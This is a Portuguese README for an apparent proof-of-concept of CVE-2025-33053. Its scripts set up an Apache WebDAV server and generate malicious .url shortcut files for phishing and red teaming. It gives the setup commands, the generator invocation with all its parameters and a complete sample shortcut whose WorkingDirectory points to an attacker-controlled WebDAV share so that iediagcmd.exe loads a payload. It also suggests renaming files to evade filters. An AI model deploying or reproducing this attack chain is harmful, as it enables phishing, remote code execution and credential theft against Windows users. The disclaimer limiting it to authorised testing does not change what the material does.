CVE-2025-33053 Prova de Conceito (PoC)
Este repositório fornece scripts para implantar automaticamente um servidor WebDAV no Ubuntu usando Apache2 e gerar arquivos de atalho .url maliciosos para uso em phishing, red teaming ou simulação de movimento lateral.
setup_webdav.sh – Script Bash para configurar o Apache2 + WebDAV.setup_webdav.py – Versão em Python do script acima.gen_url.py – Script Python para gerar arquivos de atalho .url com caminhos UNC/WebDAV.README.md – Documentação.sudosudo bash setup_webdav.sh
Ou usando Python:
sudo python3 setup_webdav.py
Por padrão, o script irá:
/var/www/webdav.DAV e DAV_FS.DavLockDB (para evitar erros de bloqueio DAV do Apache).📎 Caminho WebDAV:
http://<your-ip>/webdav/
.url Maliciosopython3 gen_url.py --ip 192.168.1.100 --out doc.url
python3 gen_url.py \
--ip 《YOUR IP ADDRESS》\
--share 《YOUR SHARE NAME》(Default: webdav) \
--out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
--exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
--icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
--index 13 \
--modified 20F06BA06D07BD014D
Isso criará um arquivo .url como:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
📌 Clicar neste arquivo (em certas configurações) pode fazer com que o sistema alvo se conecte automaticamente ao seu servidor WebDAV (autenticação ou entrega de DLL).
sudo ufw allow 80
.url podem não ser executados como esperado, dependendo de:
.url para .txt para contornar filtros.Este repositório é apenas para fins educacionais e testes de penetração autorizados.
Não use estes scripts contra sistemas que você não possui ou para os quais não tem permissão de testar.
Para dúvidas ou solicitações éticas de red teaming, entre em contato pelas issues do GitHub.